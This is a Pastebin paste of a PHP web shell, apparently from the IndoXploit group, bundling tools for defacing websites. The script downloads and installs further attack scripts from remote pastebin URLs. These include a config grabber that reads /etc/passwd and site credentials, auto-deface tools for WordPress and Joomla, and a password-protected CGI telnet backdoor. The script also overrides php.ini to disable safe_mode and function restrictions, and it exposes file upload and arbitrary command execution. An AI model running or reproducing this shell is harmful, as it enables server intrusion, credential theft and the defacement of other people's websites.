Syndrome69

gabungan tool

Apr 7th, 2019
57
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.48 KB | None | 0 0
  1. <?php
  2. // Tu5b0l3d - IndoXploit
  3. // thx for you.
  4. // http://indoxploit.blogspot.co.id/2016/01/simple-tools-for-deface.html
  5.  
  6. function parah($pastebin, $nama_file){
  7. $usa = file_get_contents("$pastebin");
  8. $frr = fopen("$nama_file", 'w');
  9. fwrite($frr, $usa);
  10. }
  11. $xp = $_GET[xp];
  12. $b = "Ini merupakan beberapa tool untuk mempermudah dalam hal mendeface ataupun yang lainnya.<br><br>#<br>Tu5b0l3d - IndoXploit";
  13. if($xp == "config_grabber_wp_jm"){
  14. $config = parah("http://pastebin.com/raw.php?i=deH5eAqP", "config_wp_jm_grabber.php");
  15.  
  16. $b = '<h2><a href="config_wp_jm_grabber.php" target="_blank">Config Grabber Wordpress dan joomla</a></h2><br>
  17. tool ini pertama ambil user dari /etc/passwd, kemudian cek apakah user Readable atau tidak, jika readable Maka akan diambil confignya';
  18.  
  19. }
  20. elseif($xp == "just_jumping"){
  21. $jump = parah("http://pastebin.com/raw.php?i=eewrEsJY", "just_jumping.php");
  22.  
  23. $b = '<h2><a href="just_jumping.php" target="_blank">Just Jumping</a></h2><br>
  24. tool jumping ini cuma melihat apakah user readable atau tidak menggunakan fungsi is_readable, jika readable, maka ditampilkan, <br>dan juga nama domainnya akan ditampilkan untuk mempermudah memakai tools yang lainnya.';
  25.  
  26. }
  27. elseif($xp == "pepes_joomla"){
  28. $pepes_joomla = parah("http://pastebin.com/raw.php?i=50NQdet2", "pepes_joomla.php");
  29.  
  30. $b = '<h2><a href="pepes_joomla.php" target="_blank">Auto Deface site cms Joomla</a></h2><br>
  31. tool ini bisa untuk auto deface jika ente tau nama sitenya, sebelumnya ambil confignya dulu <a href="?xp=config_grabber_wp_jm" target="_blank">disini</a><br>
  32. video: <a href="https://youtu.be/clvLy5pDA2I" target="_blank">tonton</a>';
  33.  
  34. }
  35. elseif($xp == "pepes_wp"){
  36. $pepes_wp = parah("http://pastebin.com/raw.php?i=uQWCGPMS", "pepes_wp.php");
  37.  
  38. $b = '<h2><a href="pepes_wp.php" target="_blank">Auto Deface site cms Wordpress</a></h2><br>
  39. tool ini bisa untuk auto deface site berCMS Wordpress, sebelumnya ambil confignya dulu <a href="?xp=config_grabber_wp_jm" target="_blank">disini</a><br>
  40. video: <a href="https://youtu.be/tWEcMuiqKlo" target="_blank">tonton</a>';
  41.  
  42. }
  43. elseif($xp == "pepes_wp2"){
  44. $pepes_wp2 = parah("http://pastebin.com/raw.php?i=4rZfJaqE", "pepes_wp2.php");
  45.  
  46. $b = '<h2><a href="pepes_wp2.php" target="_blank">Auto Deface site cms Wordpress 2</a></h2><br>
  47. Tool ini ialah untuk auto Deface site berCMS Wordpress hanya dengan memasukan link config, sebelumnya ambil confignya dulu <a href="?xp=config_grabber_wp_jm" target="_blank">disini</a><br><br>*nb: ingat, masukan Link confignya<br>';
  48.  
  49. }
  50.  
  51. elseif($xp == "link_title"){
  52. $link_title = parah("http://pastebin.com/raw.php?i=u69dMjH9", "link_title.php");
  53.  
  54. $b = '<h2><a href="link_title.php" target="_blank">Auto Deface site cms Wordpress 2</a></h2><br>
  55. Tool ini ialah untuk auto Deface site berCMS Wordpress hanya dengan memasukan link config, sebelumnya ambil confignya dulu <a href="?xp=config_grabber_wp_jm" target="_blank">disini</a><br><br>*nb: ingat, masukan Link confignya<br>';
  56.  
  57. }
  58.  
  59. elseif($xp == "cgi"){
  60. $dir = mkdir('cgi', 0777);
  61. $cgi = parah("http://pastebin.com/raw.php?i=XTUFfJLg", "cgi/anu.izo");
  62.  
  63. $acces = "AddHandler cgi-script .izo";
  64. $frr2 = fopen('cgi/.htaccess', 'w');
  65. fwrite($frr2, $acces);
  66. chmod("cgi/anu.izo", 0755);
  67.  
  68.  
  69. $b = '<h2><a href="cgi/anu.izo" target="_blank">CGI Telnet</a></h2><br>
  70. password = indoXploit<br>it\' powerfull, source: <a href="http://www.rohitab.com/cgi-telnet" target="_blank">Rohitab.com</a>';
  71.  
  72. }
  73. elseif($xp == "upload"){
  74. if($_POST['v']){
  75. if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
  76. $b = "<b>berhasil</b>-->".$_FILES["f"]["name"];
  77. }else{
  78. $b = "<b>gagal</b>";
  79. }
  80. }
  81. else{
  82. $b = "<form method=post enctype=multipart/form-data><input type=file name=f><input name=v type=submit id=v value=up><br>";
  83. }
  84.  
  85.  
  86. }
  87. elseif($xp == "bypass"){
  88. $dir = getcwd();
  89. $isi = 'safe_mode = off
  90. disable_functions = NONE
  91. ';
  92. $buka = fopen($dir.'/php.ini', 'w');
  93. fwrite($buka, $isi);
  94.  
  95. $b = '<h2><a href="php.ini" target="_blank">Bypass Disabled Functions</a></h2><br>
  96. klik link tsb.';
  97.  
  98. }
  99.  
  100.  
  101.  
  102. elseif($xp == "command"){
  103. session_start();
  104. if(empty($_SESSION["dir"]))$_SESSION["dir"]="./";
  105.  
  106. $a = '<textarea rows="10" cols="100">';
  107. if(isset($_POST['command'])){
  108. isset($_SESSION["dir"])?chdir($_SESSION["dir"]):null;
  109. $cmd=trim($_POST['command']);
  110. if(preg_match("/^cd\s/i",$cmd)){
  111. $pecah=explode(" ",preg_replace("/\s+/"," ",$cmd));
  112. if(@chdir($pecah[1])){
  113. $n="directory changed to $pecah[1]";
  114. $_SESSION["dir"].=$pecah[1]."/";
  115. }
  116. else $n="error cd";
  117. }else $n=shell_exec($_POST['command']);
  118. }else $n='';
  119. $c = "</textarea>";
  120. $b = $a.$n.$c;
  121. }
  122. echo '<!DOCTYPE html>
  123. <html>
  124. <head>
  125. <title>IndoXploit</title>
  126.  
  127. <style>
  128. a{
  129. text-decoration: none;
  130. }
  131. a:hover{
  132. color: red;
  133. }
  134. .kotak{
  135. border: 1px solid grey;
  136. width: 200px;
  137. height: 20px;
  138. text-align: center;
  139. border-radius: 3px;
  140. float: left;
  141. margin-right: 5px;
  142. }
  143. .kotak:hover{
  144. border: 1px solid red;
  145.  
  146. }
  147. #com{
  148. margin-right: 70px;
  149. float: left;
  150. }
  151.  
  152. </style>
  153. </head>
  154. <body>
  155. <center><h2>Simple Tools by Indo<font color="red">}{</font>ploit</h2></center><hr>
  156. <div class="kotak"><a href="?xp=just_jumping">Just Jumping</a></div>
  157. <div class="kotak"><a href="?xp=config_grabber_wp_jm">Config Grabber WP dan Joomla</a></div>
  158. <div class="kotak"><a href="?xp=pepes_joomla">Auto Deface site cms joomla</a></div>
  159. <div class="kotak"><a href="?xp=pepes_wp">Auto Deface site Wordpress</a></div>
  160. <div class="kotak"><a href="?xp=pepes_wp2">Auto Deface site Wordpress 2</a></div>
  161. <div class="kotak"><a href="?xp=link_title">Title site Wordpress</a></div>
  162.  
  163. ';
  164.  
  165. echo "<br><br><br>$b<br><br><br><br><hr>
  166. </body>
  167. </html>";
  168. if(@ini_get("disable_functions")){
  169. echo "Disabled Functions = <font color='red'>".@ini_get("disable_functions")."</font>";
  170. }else{
  171. echo "Disable Functions = None";
  172. }
  173.  
  174. if(@ini_get("safe_mode")){echo "<br><br>Safe Mode = <font color='red'>ON<br><br>";}else{ echo "<br><br>Safe Mode = OFF<br><br>";}
  175. $kernel = shell_exec("uname -a");
  176. echo "Kernel: <font color='red'>$kernel<br><br>";
  177. echo '<div class="kotak"><a href="?xp=bypass">Bypass disabled Functions</a></div> <div class="kotak"><a href="?xp=cgi">CGI Telnet</a></div><div class="kotak"><a href="?xp=upload">Upload File</a></div><br><br>';
  178. echo '<div id="com"><form method="post" action="?xp=command"><input type="text" name="command" placeholder="Command"><input type="submit" value="Go!"></div>';
  179.  
  180.  
  181.  
  182.  
  183.  
  184. ?>
Add Comment
Please, Sign In to add comment